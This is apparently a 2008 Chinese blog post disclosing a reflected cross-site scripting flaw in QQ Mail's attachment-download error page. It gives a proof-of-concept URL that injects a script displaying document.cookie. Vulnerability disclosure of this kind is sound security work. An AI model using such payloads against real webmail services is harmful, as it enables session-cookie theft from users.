首页 > 网络安全 > QQ Mail XSS

QQ Mail XSS

2008年11月30日 发表评论 阅读评论

在QQ邮箱附件中,提取文件时的错误没有过滤。测试:

http://m126.mail.qq.com/zh_CN/htmledition/err_filedownload.html?t=800&c=<script>alert(document.cookie)</script>

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:QQ Mail XSS
本文地址:http://www.woyigui.cn/2008/11/30/qq-mail-xss/

分类: 网络安全 标签: ,
  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.
*